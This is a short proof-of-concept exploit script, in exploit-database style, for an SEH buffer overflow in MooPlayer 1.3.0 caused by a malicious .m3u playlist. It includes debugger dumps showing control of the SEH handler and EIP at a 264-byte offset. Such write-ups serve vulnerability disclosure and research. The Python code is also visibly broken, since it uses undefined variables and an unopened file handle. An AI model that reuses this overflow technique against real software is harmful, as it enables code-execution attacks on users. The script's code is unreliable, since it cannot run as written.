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Mooplayer 1.3.0 'm3u' SEH Buffer Overflow POC

#!/usr/bin/env python
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow POC
# Date Discovered: 09-02-2015
# Exploit Author: Samandeep Singh (@samanL33T )
# Vulnerable Software: Moo player 1.3.0
# Software Link: https://mooplayer.jaleco.com/
# Vendor site: https://mooplayer.jaleco.com/
# Version: 1.3.0
# Tested On: Windows XP SP3, Win 7 x86.
# After the execution of POC, the SEH chain looks like this: 
# 01DDF92C ntdll.76FF71CD
# 01DDFF5C 43434343
# 42424242 *** CORRUPT ENTRY ***

# And the Stack

#       01DDFF44   41414141  AAAA
#       01DDFF48   41414141  AAAA
#       01DDFF4C   41414141  AAAA
#       01DDFF50   41414141  AAAA
#       01DDFF54   41414141  AAAA
#       01DDFF58   41414141  AAAA
#       01DDFF5C   42424242  BBBB  Pointer to next SEH record
#       01DDFF60   43434343  CCCC  SE handler
#       01DDFF64   00000000  ....
#       01DDFF68   44444444  DDDD
#       01DDFF6C   44444444  DDDD
#       01DDFF70   44444444  DDDD

# And the Registers

#       EAX 00000000
#       ECX 43434343
#       EDX 76FF71CD ntdll.76FF71CD
#       EBX 00000000
#       ESP 01DDF918
#       EBP 01DDF938
#       ESI 00000000
#       EDI 00000000
#       EIP 43434343
junk="\x41" * 264
nseh = "\x42" * 4
seh = "\x43" * 4
poc = head + junk + nseh + seh
junk1 = "\x44"*(buffer-len(poc))
poc += junk1
file = "mooplay_poc.m3u"
f.write(head + poc);

#Samandeep Singh - @samanL33T)